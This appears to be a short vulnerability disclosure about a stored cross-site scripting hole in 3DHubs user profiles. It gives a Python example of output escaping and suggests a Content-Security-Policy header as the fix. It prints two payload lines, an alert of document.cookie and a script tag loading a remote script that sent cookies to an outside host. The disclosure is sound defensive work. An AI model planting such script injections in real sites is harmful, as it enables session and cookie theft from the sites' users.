About 3DHubs

3DHubs is a community site which lets users offer 3D-printing services for money. For tinkerers it means you can upload a 3D model and find a person to print it for you, in exchange for a fee.

As I've recently started using 3D-printed things this is a great resource.

The Exploit

When you register for 3DHubs, as a user or a creator, you are given a public profile page.

The profile page displays text the user has written without performing any kind of escaping. For example, I put this text on my profile:

        <script>alert(document.cookie);</script>

As expected this raised an alert-box with lots of content.

Stealing content was just as easy; all it took was including a remote script instead:

        <script src="https://steve.fi/t.js"></script>

That script could make requests for off-site images, with the cookies submitted as parameters.

Fixing This Hole

Fixing this hole should be pretty simple: filter the user content and escape it at the point where it is written into the HTML of the page.
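As an added illustration of the fix (this is example code written for this write-up, not 3DHubs' own code, and the template is a hypothetical stand-in for whatever their profile page really uses), the following renders a constructed profile bio containing the same kind of script tag as above, once with the raw interpolation that caused the hole and once with output escaping:

```python
import html

# Constructed sample of user-supplied profile text: the same kind of payload
# the write-up describes, a script tag typed into a profile's bio field.
SAMPLE_PROFILE_TEXT = '<script>alert(document.cookie);</script> Hi, I print in PLA.'

# Hypothetical page template; the real 3DHubs template is not known here.
PROFILE_TEMPLATE = '<div class="bio">{bio}</div>'


def render_profile_vulnerable(bio: str) -> str:
    """Vulnerable: interpolates the user's text straight into the HTML.

    Any markup the user typed, including <script>, is emitted verbatim and
    executed by every browser that views the profile (stored XSS).
    """
    return PROFILE_TEMPLATE.format(bio=bio)


def render_profile_fixed(bio: str) -> str:
    """Fixed: escape at the point of output, so the text is displayed, not parsed.

    html.escape(quote=True) turns & < > " ' into entities. Escaping on output,
    rather than only 'cleaning' on input, is the durable fix: the stored value
    stays exactly what the user typed, and every render path is safe no matter
    how the data reached the database.
    """
    return PROFILE_TEMPLATE.format(bio=html.escape(bio, quote=True))


def contains_active_markup(rendered: str) -> bool:
    """Crude check used only to show the difference between the two renderers:
    does the output still contain a raw <script tag that a browser would run?"""
    return '<script' in rendered.lower()


if __name__ == '__main__':
    for name, render in (('vulnerable', render_profile_vulnerable),
                         ('fixed', render_profile_fixed)):
        out = render(SAMPLE_PROFILE_TEXT)
        print(f'{name}: {out}')
        print(f'  raw <script> survives: {contains_active_markup(out)}')
```

Escaping at output time is the important part: the stored bio is unchanged, but the browser receives `&lt;script&gt;` and shows it as text. As defence in depth, a Content-Security-Policy header that limits `script-src` to the site's own origin would also stop a browser from loading a remote script such as the `t.js` include above, even on a page where escaping had been missed.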

Timeline

Vendor notified: May 4th 2017 - Twitter
Fixed??